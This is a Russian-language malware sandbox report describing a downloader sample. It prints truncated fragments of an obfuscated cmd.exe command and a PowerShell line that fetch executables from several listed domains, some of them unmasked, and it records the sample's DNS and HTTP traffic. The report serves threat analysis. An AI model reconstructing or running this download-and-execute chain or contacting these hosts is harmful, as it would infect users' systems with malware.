Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:ON/C"set Jqxm= }}{hctac}}kaerb;rJf$ ssecorP-tratS;)rJf$(elifotevas.BrH$;)ydoBesnopser.iZo$(etirw.BrH$;1 = epyt.BrH$;)(nepo.BrH${ )'*ZM*' ekil- txetesnopser.iZo$( fI;)(dnes.iZ...
Сетевая активность
Подключается к
- 'bo####wisata.com':80
- 'ca####ewarren.com':80
- 'bo###ride.co.uk':80
TCP
Запросы HTTP GET
- http://bo####wisata.com/3Vi6B88
- http://ca####ewarren.com/S3MpTtz
- http://bo###ride.co.uk/5KXUiIhvIh
UDP
- DNS ASK bo####wisata.com
- DNS ASK ca####ewarren.com
- DNS ASK ac####traffic.net
- DNS ASK bo###ride.co.uk
- DNS ASK vo####ailand.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set Jqxm= }}{hctac}}kaerb;rJf$ ssecorP-tratS;)rJf$(elifotevas.BrH$;)ydoBesnopser.iZo$(etirw.BrH$;1 = epyt.BrH$;)(nepo.BrH${ )'*ZM*' ekil- txetesnopser.iZo$( fI;)(dnes.iZ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "powershell $jsG='HNs';$Pcp='http://bo####wisata.com/3Vi6B88@http://carminewarren.com/S3MpTtz@http://actualtraffic.net/5hAEMoao@http://bowsbride.co.uk/5KXUiIhvIh@http://volathailand.com/Imgihpl...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =HNs
